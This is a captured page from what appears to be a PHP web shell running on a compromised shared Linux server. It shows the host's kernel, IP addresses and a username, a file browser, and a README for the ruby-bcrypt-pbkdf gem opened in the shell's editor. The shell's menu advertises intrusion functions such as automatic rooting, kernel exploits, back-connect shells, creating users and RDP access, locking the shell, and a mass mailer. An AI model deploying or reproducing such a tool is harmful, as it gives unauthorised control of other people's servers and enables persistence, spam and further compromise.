Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
ruby-bcrypt-pbkdf /
[ HOME SHELL ]
Name
Size
Permission
Action
README.md
985
B
-rw-r--r--
changelog.Debian.gz
991
B
-rw-r--r--
copyright
5.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# bcrypt_pbkdf-ruby bcrypt_pbkdf is a ruby gem implementing bcrypt_pbkdf from OpenBSD. This is currently used by net-ssh to read password encrypted Ed25519 keys. [](https://travis-ci.org/mfazekas/bcrypt_pbkdf-ruby) # Acknowledgements * The gut of the code is based on OpenBSD's bcrypt_pbkdf.c implementation * Some ideas/code were taken adopted bcrypt-ruby: https://github.com/codahale/bcrypt-ruby # Links: http://www.tedunangst.com/flak/post/bcrypt-pbkdf http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/lib/libutil/bcrypt_pbkdf.c?rev=1.13&content-type=text/x-cvsweb-markup # Building For windows cross build make sure you checked out the gem source under the home directory ```sh gem install rake-compiler-dock ``` ```sh bundle exec rake compile bundle exec rake test bundle exec rake clean clobber bundle exec rake gem:windows bundle exec rake release bundle exec rake gem:windows:release ```
Close